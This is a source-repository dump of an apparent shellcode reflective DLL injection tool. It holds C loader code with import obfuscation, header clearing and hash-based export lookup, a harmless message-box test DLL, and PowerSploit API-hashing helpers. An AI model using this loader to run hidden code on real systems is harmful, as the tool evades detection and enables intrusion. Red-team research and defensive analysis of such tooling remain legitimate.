276 | sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);
277 | lastSectionEnd = 0;
278 |
279 | for (i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++, sectionHeader++) {
280 | if (sectionHeader->SizeOfRawData == 0) {
281 | endOfSection = sectionHeader->VirtualAddress + ntHeaders->OptionalHeader.SectionAlignment;
282 | }
283 | else {
284 | endOfSection = sectionHeader->VirtualAddress + sectionHeader->SizeOfRawData;
285 | }
286 |
287 | if (endOfSection > lastSectionEnd) {
288 | lastSectionEnd = endOfSection;
289 | }
290 | }
291 |
292 | pGetNativeSystemInfo(&sysInfo);
293 | alignedImageSize = (DWORD)AlignValueUp(ntHeaders->OptionalHeader.SizeOfImage, sysInfo.dwPageSize);
294 | if (alignedImageSize != AlignValueUp(lastSectionEnd, sysInfo.dwPageSize)) {
295 | return 0;
296 | }
297 |
298 | // Allocate all the memory for the DLL to be loaded into. Attempt to use the preferred base address.
299 |
300 | baseAddress = (ULONG_PTR)pVirtualAlloc(
301 | (LPVOID)(ntHeaders->OptionalHeader.ImageBase),
302 | alignedImageSize,
303 | MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
304 | );
305 |
306 | if (baseAddress == 0) {
307 | baseAddress = (ULONG_PTR)pVirtualAlloc(
308 | NULL,
309 | alignedImageSize,
310 | MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE
311 | );
312 | }
313 |
314 | // Copy over the headers
315 |
316 | if (dwFlags & SRDI_CLEARHEADER) {
317 | ((PIMAGE_DOS_HEADER)baseAddress)->e_lfanew = ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew;
318 |
319 | for (i = ((PIMAGE_DOS_HEADER)pbModule)->e_lfanew; i < ntHeaders->OptionalHeader.SizeOfHeaders; i++) {
320 | ((PBYTE)baseAddress)[i] = ((PBYTE)pbModule)[i];
321 | }
322 |
323 | }else{
324 | for (i = 0; i < ntHeaders->OptionalHeader.SizeOfHeaders; i++) {
325 | ((PBYTE)baseAddress)[i] = ((PBYTE)pbModule)[i];
326 | }
327 | }
328 |
329 | ntHeaders = RVA(PIMAGE_NT_HEADERS, baseAddress, ((PIMAGE_DOS_HEADER)baseAddress)->e_lfanew);
330 |
331 | ///
332 | // STEP 3: Load in the sections
333 | ///
334 |
335 | sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);
336 |
337 | for (i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++, sectionHeader++) {
338 | for (c = 0; c < sectionHeader->SizeOfRawData; c++) {
339 | ((PBYTE)(baseAddress + sectionHeader->VirtualAddress))[c] = ((PBYTE)(pbModule + sectionHeader->PointerToRawData))[c];
340 | }
341 | }
342 |
343 | ///
344 | // STEP 4: process all of our images relocations (assuming we missed the preferred address)
345 | ///
346 |
347 | baseOffset = baseAddress - ntHeaders->OptionalHeader.ImageBase;
348 | dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
349 |
350 | if (baseOffset && dataDir->Size) {
351 |
352 | relocation = RVA(PIMAGE_BASE_RELOCATION, baseAddress, dataDir->VirtualAddress);
353 |
354 | while (relocation->VirtualAddress) {
355 | relocList = (PIMAGE_RELOC)(relocation + 1);
356 |
357 | while ((PBYTE)relocList != (PBYTE)relocation + relocation->SizeOfBlock) {
358 |
359 | if (relocList->type == IMAGE_REL_BASED_DIR64)
360 | *(PULONG_PTR)((PBYTE)baseAddress + relocation->VirtualAddress + relocList->offset) += baseOffset;
361 | else if (relocList->type == IMAGE_REL_BASED_HIGHLOW)
362 | *(PULONG_PTR)((PBYTE)baseAddress + relocation->VirtualAddress + relocList->offset) += (DWORD)baseOffset;
363 | else if (relocList->type == IMAGE_REL_BASED_HIGH)
364 | *(PULONG_PTR)((PBYTE)baseAddress + relocation->VirtualAddress + relocList->offset) += HIWORD(baseOffset);
365 | else if (relocList->type == IMAGE_REL_BASED_LOW)
366 | *(PULONG_PTR)((PBYTE)baseAddress + relocation->VirtualAddress + relocList->offset) += LOWORD(baseOffset);
367 |
368 | relocList++;
369 | }
370 | relocation = (PIMAGE_BASE_RELOCATION)relocList;
371 | }
372 | }
373 |
374 | ///
375 | // STEP 5: process our import table
376 | ///
377 |
378 | dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
379 | randSeed = (DWORD)((ULONGLONG)pbModule);
380 |
381 | if (dataDir->Size) {
382 |
383 | importDesc = RVA(PIMAGE_IMPORT_DESCRIPTOR, baseAddress, dataDir->VirtualAddress);
384 | importCount = 0;
385 | for (; importDesc->Name; importDesc++) {
386 | importCount++;
387 | }
388 |
389 | sleep = 0;
390 | importDesc = RVA(PIMAGE_IMPORT_DESCRIPTOR, baseAddress, dataDir->VirtualAddress);
391 | if (dwFlags & SRDI_OBFUSCATEIMPORTS && importCount > 1) {
392 | sleep = (dwFlags & 0xFFFF0000);
393 | sleep = sleep >> 16;
394 |
395 | for (i = 0; i < importCount - 1; i++) {
396 | randSeed = (214013 * randSeed + 2531011);
397 | rand = (randSeed >> 16) & 0x7FFF;
398 | selection = i + rand / (32767 / (importCount - i) + 1);
399 |
400 | tempDesc = importDesc[selection];
401 | importDesc[selection] = importDesc[i];
402 | importDesc[i] = tempDesc;
403 | }
404 | }
405 |
406 | importDesc = RVA(PIMAGE_IMPORT_DESCRIPTOR, baseAddress, dataDir->VirtualAddress);
407 | for (; importDesc->Name; importDesc++) {
408 |
409 | library = pLoadLibraryA((LPSTR)(baseAddress + importDesc->Name));
410 |
411 | firstThunk = RVA(PIMAGE_THUNK_DATA, baseAddress, importDesc->FirstThunk);
412 | origFirstThunk = RVA(PIMAGE_THUNK_DATA, baseAddress, importDesc->OriginalFirstThunk);
413 |
414 | for (; origFirstThunk->u1.Function; firstThunk++, origFirstThunk++) {
415 |
416 | if (IMAGE_SNAP_BY_ORDINAL(origFirstThunk->u1.Ordinal)) {
417 | pLdrGetProcAddress(library, NULL, (WORD)origFirstThunk->u1.Ordinal, (PVOID *)&(firstThunk->u1.Function));
418 | }
419 | else {
420 | importByName = RVA(PIMAGE_IMPORT_BY_NAME, baseAddress, origFirstThunk->u1.AddressOfData);
421 | FILL_STRING(aString, importByName->Name);
422 | pLdrGetProcAddress(library, &aString, 0, (PVOID*)&(firstThunk->u1.Function));
423 | }
424 | }
425 |
426 | if (sleep && dwFlags & SRDI_OBFUSCATEIMPORTS && importCount > 1) {
427 | pSleep(sleep * 1000);
428 | }
429 | }
430 | }
431 |
432 | ///
433 | // STEP 6: process our delayed import table
434 | ///
435 |
436 | dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT];
437 |
438 | if (dataDir->Size) {
439 | delayDesc = RVA(PIMAGE_DELAYLOAD_DESCRIPTOR, baseAddress, dataDir->VirtualAddress);
440 |
441 | for (; delayDesc->DllNameRVA; delayDesc++) {
442 |
443 | library = pLoadLibraryA((LPSTR)(baseAddress + delayDesc->DllNameRVA));
444 |
445 | firstThunk = RVA(PIMAGE_THUNK_DATA, baseAddress, delayDesc->ImportAddressTableRVA);
446 | origFirstThunk = RVA(PIMAGE_THUNK_DATA, baseAddress, delayDesc->ImportNameTableRVA);
447 |
448 | for (; firstThunk->u1.Function; firstThunk++, origFirstThunk++) {
449 | if (IMAGE_SNAP_BY_ORDINAL(origFirstThunk->u1.Ordinal)) {
450 | pLdrGetProcAddress(library, NULL, (WORD)origFirstThunk->u1.Ordinal, (PVOID *)&(firstThunk->u1.Function));
451 | }
452 | else {
453 | importByName = RVA(PIMAGE_IMPORT_BY_NAME, baseAddress, origFirstThunk->u1.AddressOfData);
454 | FILL_STRING(aString, importByName->Name);
455 | pLdrGetProcAddress(library, &aString, 0, (PVOID *)&(firstThunk->u1.Function));
456 | }
457 | }
458 | }
459 | }
460 |
461 |
462 | ///
463 | // STEP 7: Finalize our sections. Set memory protections.
464 | ///
465 |
466 | sectionHeader = IMAGE_FIRST_SECTION(ntHeaders);
467 |
468 | for (i = 0; i < ntHeaders->FileHeader.NumberOfSections; i++, sectionHeader++) {
469 |
470 | if (sectionHeader->SizeOfRawData) {
471 |
472 | // determine protection flags based on characteristics
473 | executable = (sectionHeader->Characteristics & IMAGE_SCN_MEM_EXECUTE) != 0;
474 | readable = (sectionHeader->Characteristics & IMAGE_SCN_MEM_READ) != 0;
475 | writeable = (sectionHeader->Characteristics & IMAGE_SCN_MEM_WRITE) != 0;
476 |
477 | if (!executable && !readable && !writeable)
478 | protect = PAGE_NOACCESS;
479 | else if (!executable && !readable && writeable)
480 | protect = PAGE_WRITECOPY;
481 | else if (!executable && readable && !writeable)
482 | protect = PAGE_READONLY;
483 | else if (!executable && readable && writeable)
484 | protect = PAGE_READWRITE;
485 | else if (executable && !readable && !writeable)
486 | protect = PAGE_EXECUTE;
487 | else if (executable && !readable && writeable)
488 | protect = PAGE_EXECUTE_WRITECOPY;
489 | else if (executable && readable && !writeable)
490 | protect = PAGE_EXECUTE_READ;
491 | else if (executable && readable && writeable)
492 | protect = PAGE_EXECUTE_READWRITE;
493 |
494 | if (sectionHeader->Characteristics & IMAGE_SCN_MEM_NOT_CACHED) {
495 | protect |= PAGE_NOCACHE;
496 | }
497 |
498 | // change memory access flags
499 | pVirtualProtect(
500 | (LPVOID)(baseAddress + sectionHeader->VirtualAddress),
501 | sectionHeader->SizeOfRawData,
502 | protect, &protect
503 | );
504 | }
505 |
506 | }
507 |
508 | // We must flush the instruction cache to avoid stale code being used
509 | pFlushInstructionCache((HANDLE)-1, NULL, 0);
510 |
511 | ///
512 | // STEP 8: Execute TLS callbacks
513 | ///
514 |
515 | dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_TLS];
516 |
517 | if (dataDir->Size)
518 | {
519 | tlsDir = RVA(PIMAGE_TLS_DIRECTORY, baseAddress, dataDir->VirtualAddress);
520 | callback = (PIMAGE_TLS_CALLBACK *)(tlsDir->AddressOfCallBacks);
521 |
522 | for (; *callback; callback++) {
523 | (*callback)((LPVOID)baseAddress, DLL_PROCESS_ATTACH, NULL);
524 | }
525 | }
526 |
527 | ///
528 | // STEP 9: Register exception handlers (x64 only)
529 | ///
530 |
531 | #ifdef _WIN64
532 | dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXCEPTION];
533 |
534 | if (pRtlAddFunctionTable && dataDir->Size)
535 | {
536 | rfEntry = RVA(PIMAGE_RUNTIME_FUNCTION_ENTRY, baseAddress, dataDir->VirtualAddress);
537 | pRtlAddFunctionTable(rfEntry, (dataDir->Size / sizeof(IMAGE_RUNTIME_FUNCTION_ENTRY)) - 1, baseAddress);
538 | }
539 | #endif
540 |
541 | ///
542 | // STEP 10: call our images entry point
543 | ///
544 |
545 | dllMain = RVA(DLLMAIN, baseAddress, ntHeaders->OptionalHeader.AddressOfEntryPoint);
546 | dllMain((HINSTANCE)baseAddress, DLL_PROCESS_ATTACH, (LPVOID)1);
547 |
548 | ///
549 | // STEP 11: call our exported function
550 | ///
551 |
552 | if (dwFunctionHash) {
553 |
554 | do
555 | {
556 | dataDir = &ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
557 | if (!dataDir->Size)
558 | break;
559 |
560 | exportDir = (PIMAGE_EXPORT_DIRECTORY)(baseAddress + dataDir->VirtualAddress);
561 | if (!exportDir->NumberOfNames || !exportDir->NumberOfFunctions)
562 | break;
563 |
564 | expName = RVA(PDWORD, baseAddress, exportDir->AddressOfNames);
565 | expOrdinal = RVA(PWORD, baseAddress, exportDir->AddressOfNameOrdinals);
566 |
567 | for (i = 0; i < exportDir->NumberOfNames; i++, expName++, expOrdinal++) {
568 |
569 | expNameStr = RVA(LPCSTR, baseAddress, *expName);
570 | funcHash = 0;
571 |
572 | if (!expNameStr)
573 | break;
574 |
575 | for (; *expNameStr; expNameStr++) {
576 | funcHash += *expNameStr;
577 | funcHash = ROTR32(funcHash, 13);
578 |
579 | }
580 |
581 | if (dwFunctionHash == funcHash && expOrdinal)
582 | {
583 | exportFunc = RVA(EXPORTFUNC, baseAddress, *(PDWORD)(baseAddress + exportDir->AddressOfFunctions + (*expOrdinal * 4)));
584 |
585 | if (dwFlags & SRDI_PASS_SHELLCODE_BASE) {
586 | exportFunc(pvShellcodeBase, sizeof(PVOID));
587 | } else {
588 | exportFunc(lpUserData, dwUserdataLen);
589 | }
590 |
591 | break;
592 | }
593 | }
594 | } while (0);
595 | }
596 |
597 | if (dwFlags & SRDI_CLEARMEMORY && pVirtualFree && pLocalFree) {
598 | if (!pVirtualFree((LPVOID)pbModule, 0, 0x8000))
599 | pLocalFree((LPVOID)pbModule);
600 | }
601 |
602 | // Atempt to return a handle to the module
603 | return baseAddress;
604 | }
605 |
--------------------------------------------------------------------------------
/ShellcodeRDI/ShellcodeRDI.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 |
23 |
24 | Source Files
25 |
26 |
27 |
--------------------------------------------------------------------------------
/ShellcodeRDI/function_link_order.txt:
--------------------------------------------------------------------------------
1 | LoadDLL
2 | GetProcAddressWithHash
--------------------------------------------------------------------------------
/TestDLL/Resource.rc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/monoxgas/sRDI/9fdd5c44383039519accd1e6bac4acd5a046a92c/TestDLL/Resource.rc
--------------------------------------------------------------------------------
/TestDLL/TestDLL.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | {558D08E4-48B4-4E5F-94E5-5783CF0557C4}
23 | Win32Proj
24 | TestDLL
25 | 10.0
26 |
27 |
28 |
29 | DynamicLibrary
30 | true
31 | v142
32 | Unicode
33 |
34 |
35 | DynamicLibrary
36 | false
37 | v142
38 | true
39 | Unicode
40 |
41 |
42 | DynamicLibrary
43 | true
44 | v142
45 | Unicode
46 |
47 |
48 | DynamicLibrary
49 | false
50 | v142
51 | true
52 | Unicode
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 | true
74 |
75 |
76 | true
77 |
78 |
79 | false
80 |
81 |
82 | false
83 |
84 |
85 |
86 |
87 |
88 | Level3
89 | Disabled
90 | WIN32;_DEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions)
91 | MultiThreadedDebug
92 | Async
93 |
94 |
95 | Windows
96 | true
97 |
98 |
99 | copy /y "$(TargetPath)" "$(SolutionDir)Bin\TestDLL_x86.dll"
100 |
101 |
102 |
103 |
104 |
105 |
106 | Level3
107 | Disabled
108 | _DEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions)
109 | MultiThreadedDebug
110 | Async
111 |
112 |
113 | Windows
114 | true
115 |
116 |
117 | copy /y "$(TargetPath)" "$(SolutionDir)Bin\TestDLL_x64.dll"
118 |
119 |
120 |
121 |
122 | Level3
123 |
124 |
125 | MaxSpeed
126 | true
127 | true
128 | WIN32;NDEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions)
129 | MultiThreaded
130 | Async
131 |
132 |
133 | Windows
134 | true
135 | true
136 | true
137 |
138 |
139 | copy /y "$(TargetPath)" "$(SolutionDir)Bin\TestDLL_x86.dll"
140 |
141 |
142 |
143 |
144 | Level3
145 |
146 |
147 | MaxSpeed
148 | true
149 | true
150 | NDEBUG;_WINDOWS;_USRDLL;TESTDLL_EXPORTS;%(PreprocessorDefinitions)
151 | MultiThreaded
152 | Async
153 |
154 |
155 | Windows
156 | true
157 | true
158 | true
159 |
160 |
161 | copy /y "$(TargetPath)" "$(SolutionDir)Bin\TestDLL_x64.dll"
162 |
163 |
164 |
165 |
166 | false
167 |
168 |
169 | false
170 |
171 |
172 | false
173 |
174 |
175 | false
176 |
177 |
178 |
179 |
180 |
181 |
182 |
183 |
--------------------------------------------------------------------------------
/TestDLL/TestDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/TestDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | DWORD threadID;
5 |
6 | BOOL APIENTRY DllMain( HMODULE hModule,
7 | DWORD ul_reason_for_call,
8 | LPVOID lpReserved
9 | )
10 | {
11 | switch (ul_reason_for_call)
12 | {
13 | case DLL_PROCESS_ATTACH:
14 | MessageBoxA(NULL, "DLLMain!", "We've started.", 0);
15 | break;
16 | case DLL_THREAD_ATTACH:
17 | case DLL_THREAD_DETACH:
18 | case DLL_PROCESS_DETACH:
19 | break;
20 | }
21 | return TRUE;
22 | }
23 |
24 | //extern "C" to prevent C++ name mangling
25 | extern "C" __declspec(dllexport) BOOL SayGoodbye(LPVOID lpUserdata, DWORD nUserdataLen)
26 | {
27 | try {
28 | int i = 0, j = 1;
29 | j /= i; // This will throw a SE (divide by zero).
30 | }
31 | catch (...) {
32 | MessageBoxA(NULL, "C++ Exception Thrown!", "Caught it", 0);
33 | }
34 |
35 | MessageBoxA(NULL, "I'm Leaving!", "Goodbye", 0);
36 |
37 | return TRUE;
38 | }
39 |
40 | extern "C" __declspec(dllexport) BOOL SayHello(LPVOID lpUserdata, DWORD nUserdataLen)
41 | {
42 | if (nUserdataLen) {
43 | DWORD length = 10 + nUserdataLen;
44 | LPSTR greeting = (LPSTR)malloc(length);
45 | sprintf_s(greeting, length, "Hello %s!", (LPSTR)lpUserdata);
46 | MessageBoxA(NULL, greeting, "Hello", 0);
47 | free(greeting);
48 | }
49 | else {
50 | MessageBoxA(NULL, "I'm alive!", "Hello", 0);
51 | }
52 |
53 | return TRUE;
54 | }
55 |
56 |
--------------------------------------------------------------------------------
/TestDLL/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by Resource.rc
4 |
5 | // Next default values for new objects
6 | //
7 | #ifdef APSTUDIO_INVOKED
8 | #ifndef APSTUDIO_READONLY_SYMBOLS
9 | #define _APS_NEXT_RESOURCE_VALUE 101
10 | #define _APS_NEXT_COMMAND_VALUE 40001
11 | #define _APS_NEXT_CONTROL_VALUE 1001
12 | #define _APS_NEXT_SYMED_VALUE 101
13 | #endif
14 | #endif
15 |
--------------------------------------------------------------------------------
/bin/.gitignore:
--------------------------------------------------------------------------------
1 | # Ignore everything in this directory
2 | *
3 | # Except this file
4 | !.gitignore
--------------------------------------------------------------------------------
/lib/PowerShell/Get-FunctionHash.ps1:
--------------------------------------------------------------------------------
1 | function Get-FunctionHash
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Outputs a module and function hash that can be passed to the
7 | GetProcAddressWithHash function.
8 |
9 | PowerSploit Function: Get-FunctionHash
10 | Author: Matthew Graeber (@mattifestation)
11 | License: BSD 3-Clause
12 | Required Dependencies: None
13 | Optional Dependencies: None
14 |
15 | .DESCRIPTION
16 |
17 | Get-FunctionHash calculates a hash that can be passed to
18 | GetProcAddressWithHash - a C function that is used to resolve Win32
19 | library functions. Passing a hash to a function address resolver
20 | prevents plaintext strings from being sent in the clear in shellcode.
21 |
22 | A python implementation of this algorithm is present in Meatsploit
23 | will perform hash collision detection.
24 |
25 | .PARAMETER Module
26 |
27 | Specifies the module to be hashed. Be sure to include the file extension.
28 | The module name will be normalized to upper case.
29 |
30 | .PARAMETER Function
31 |
32 | Specifies the function to be hashed. The function name is case-sensitive.
33 |
34 | .PARAMETER RorValue
35 |
36 | Specifies the value by which the hashing algorithm rotates right. The
37 | range of possibles values is 1-31.
38 |
39 | .EXAMPLE
40 |
41 | Get-FunctionHash kernel32.dll LoadLibraryA
42 |
43 | .OUTPUTS
44 |
45 | System.String
46 |
47 | Outputs a hexadecimal representation of the function hash.
48 |
49 | .LINK
50 |
51 | http://www.exploit-monday.com/
52 | https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py
53 | #>
54 |
55 | [CmdletBinding()] Param (
56 | [Parameter(Position = 0, Mandatory = $True)]
57 | [ValidateNotNullOrEmpty()]
58 | [String]
59 | $Module,
60 |
61 | [Parameter(Position = 1, Mandatory = $True)]
62 | [ValidateNotNullOrEmpty()]
63 | [String]
64 | $Function,
65 |
66 | [Parameter(Position = 2)]
67 | [ValidateRange(1, 31)]
68 | [String]
69 | $RorValue = 13
70 | )
71 |
72 | $MethodInfo = New-Object Reflection.Emit.DynamicMethod('Ror', [UInt32], @([UInt32], [UInt32]))
73 | $ILGen = $MethodInfo.GetILGenerator(8)
74 |
75 | # C# equivalent of: return x >> n | x << 32 - n;
76 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
77 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
78 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 31)
79 | $ILGen.Emit([Reflection.Emit.OpCodes]::And)
80 | $ILGen.Emit([Reflection.Emit.OpCodes]::Shr_Un)
81 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
82 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 32)
83 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
84 | $ILGen.Emit([Reflection.Emit.OpCodes]::Sub)
85 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldc_I4_S, 31)
86 | $ILGen.Emit([Reflection.Emit.OpCodes]::And)
87 | $ILGen.Emit([Reflection.Emit.OpCodes]::Shl)
88 | $ILGen.Emit([Reflection.Emit.OpCodes]::Or)
89 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ret)
90 |
91 | $Delegate = [Func``3[UInt32, UInt32, UInt32]]
92 |
93 | $Ror = $MethodInfo.CreateDelegate($Delegate)
94 |
95 | $MethodInfo = New-Object Reflection.Emit.DynamicMethod('Add', [UInt32], @([UInt32], [UInt32]))
96 | $ILGen = $MethodInfo.GetILGenerator(2)
97 |
98 | # C# equivalent of: return x + y;
99 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_0)
100 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ldarg_1)
101 | $ILGen.Emit([Reflection.Emit.OpCodes]::Add)
102 | $ILGen.Emit([Reflection.Emit.OpCodes]::Ret)
103 |
104 | $Add = $MethodInfo.CreateDelegate($Delegate)
105 |
106 | $UnicodeEncoder = [Text.Encoding]::Unicode
107 |
108 | $Module = $Module.ToUpper()
109 | [Byte[]] $ModuleBytes = $UnicodeEncoder.GetBytes($Module) + [Byte[]] @(0, 0)
110 | $ModuleHash = [UInt32] 0
111 |
112 | # Iterate over each byte of the unicode module string including nulls
113 | for ($i = 0; $i -lt $ModuleBytes.Length; $i++)
114 | {
115 | $ModuleHash = $Ror.Invoke($ModuleHash, 13)
116 | $ModuleHash = $Add.Invoke($ModuleHash, $ModuleBytes[$i])
117 | }
118 |
119 | $AsciiEncoder = [Text.Encoding]::ASCII
120 | [Byte[]] $FunctionBytes = $AsciiEncoder.GetBytes($Function) + @([Byte] 0)
121 | $FunctionHash = [UInt32] 0
122 |
123 | # Iterate over each byte of the function string including the null terminator
124 | for ($i = 0; $i -lt $FunctionBytes.Length; $i++)
125 | {
126 | $FunctionHash = $Ror.Invoke($FunctionHash, $RorValue)
127 | $FunctionHash = $Add.Invoke($FunctionHash, $FunctionBytes[$i])
128 | }
129 |
130 | # Add the function hash to the module hash
131 | $FinalHash = $Add.Invoke($ModuleHash, $FunctionHash)
132 |
133 | # Write out the hexadecimal representation of the hash
134 | Write-Output "0x$($FinalHash.ToString('X8'))"
135 | }
--------------------------------------------------------------------------------
/lib/PowerShell/Get-LibSymbols.ps1:
--------------------------------------------------------------------------------
1 | function Get-LibSymbols
2 | {
3 | <#
4 | .SYNOPSIS
5 |
6 | Displays symbolic information from Windows lib files.
7 |
8 | PowerSploit Function: Get-LibSymbols
9 | Author: Matthew Graeber (@mattifestation)
10 | License: BSD 3-Clause
11 | Required Dependencies: None
12 | Optional Dependencies: None
13 |
14 | .DESCRIPTION
15 |
16 | Get-LibSymbols parses and returns symbols in Windows .lib files
17 | in both decorated and undecorated form (for C++ functions).
18 |
19 | .PARAMETER Path
20 |
21 | Specifies a path to one or more lib file locations.
22 |
23 | .EXAMPLE
24 |
25 | C:\PS>Get-LibSymbols -Path msvcrt.lib
26 |
27 | .EXAMPLE
28 |
29 | C:\PS>ls *.lib | Get-LibSymbols
30 |
31 | .INPUTS
32 |
33 | System.String[]
34 |
35 | You can pipe a file system path (in quotation marks) to Get-LibSymbols.
36 |
37 | .OUTPUTS
38 |
39 | COFF.SymbolInfo
40 |
41 | .LINK
42 |
43 | http://www.exploit-monday.com/
44 | #>
45 | [CmdletBinding()] Param (
46 | [Parameter(Position = 0, Mandatory = $True, ValueFromPipelineByPropertyName = $True)]
47 | [ValidateScript({ Test-Path $_ })]
48 | [Alias('FullName')]
49 | [String[]]
50 | $Path
51 | )
52 |
53 | BEGIN
54 | {
55 | $Code = @'
56 | using System;
57 | using System.IO;
58 | using System.Text;
59 | using System.Runtime.InteropServices;
60 |
61 | namespace COFF
62 | {
63 | public class HEADER
64 | {
65 | public ushort Machine;
66 | public ushort NumberOfSections;
67 | public DateTime TimeDateStamp;
68 | public uint PointerToSymbolTable;
69 | public uint NumberOfSymbols;
70 | public ushort SizeOfOptionalHeader;
71 | public ushort Characteristics;
72 |
73 | public HEADER(BinaryReader br)
74 | {
75 | this.Machine = br.ReadUInt16();
76 | this.NumberOfSections = br.ReadUInt16();
77 | this.TimeDateStamp = (new DateTime(1970, 1, 1, 0, 0, 0)).AddSeconds(br.ReadUInt32());
78 | this.PointerToSymbolTable = br.ReadUInt32();
79 | this.NumberOfSymbols = br.ReadUInt32();
80 | this.SizeOfOptionalHeader = br.ReadUInt16();
81 | this.Characteristics = br.ReadUInt16();
82 | }
83 | }
84 |
85 | public class IMAGE_ARCHIVE_MEMBER_HEADER
86 | {
87 | public string Name;
88 | public DateTime Date;
89 | public ulong Size;
90 | public string EndHeader;
91 |
92 | public IMAGE_ARCHIVE_MEMBER_HEADER(BinaryReader br)
93 | {
94 | string tempName = Encoding.UTF8.GetString(br.ReadBytes(16));
95 | DateTime dt = new DateTime(1970, 1, 1, 0, 0, 0);
96 | this.Name = tempName.Substring(0, tempName.IndexOf((Char) 47));
97 | this.Date = dt.AddSeconds(Convert.ToDouble(Encoding.UTF8.GetString(br.ReadBytes(12)).Split((Char) 20)[0]));
98 | br.ReadBytes(20); // Skip over UserID, GroupID, and Mode. They are useless fields.
99 | this.Size = Convert.ToUInt64(Encoding.UTF8.GetString(br.ReadBytes(10)).Split((Char) 20)[0]);
100 | this.EndHeader = Encoding.UTF8.GetString(br.ReadBytes(2));
101 | }
102 | }
103 |
104 | public class Functions
105 | {
106 | [DllImport("dbghelp.dll", SetLastError=true, PreserveSig=true)]
107 | public static extern int UnDecorateSymbolName(
108 | [In] [MarshalAs(UnmanagedType.LPStr)] string DecoratedName,
109 | [Out] StringBuilder UnDecoratedName,
110 | [In] [MarshalAs(UnmanagedType.U4)] uint UndecoratedLength,
111 | [In] [MarshalAs(UnmanagedType.U4)] uint Flags);
112 | }
113 | }
114 | '@
115 |
116 | Add-Type -TypeDefinition $Code
117 |
118 | function Dispose-Objects
119 | {
120 | $BinaryReader.Close()
121 | $FileStream.Dispose()
122 | }
123 | }
124 |
125 | PROCESS
126 | {
127 | foreach ($File in $Path)
128 | {
129 | # Resolve the absolute path of the lib file. [IO.File]::OpenRead requires an absolute path.
130 | $LibFilePath = Resolve-Path $File
131 |
132 | # Pull out just the file name
133 | $LibFileName = Split-Path $LibFilePath -Leaf
134 |
135 | $IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR = 60
136 | $IMAGE_ARCHIVE_START = "!`n" # Magic used for lib files
137 | $IMAGE_SIZEOF_LIB_HDR = $IMAGE_SIZEOF_ARCHIVE_MEMBER_HDR + $IMAGE_ARCHIVE_START.Length
138 | $IMAGE_ARCHIVE_END = "```n" # Footer of an archive header
139 | $SizeofCOFFFileHeader = 20
140 |
141 | # Open the object file for reading
142 | $FileStream = [IO.File]::OpenRead($LibFilePath)
143 |
144 | $FileLength = $FileStream.Length
145 |
146 | # Validate lib header size
147 | if ($FileLength -lt $IMAGE_SIZEOF_LIB_HDR)
148 | {
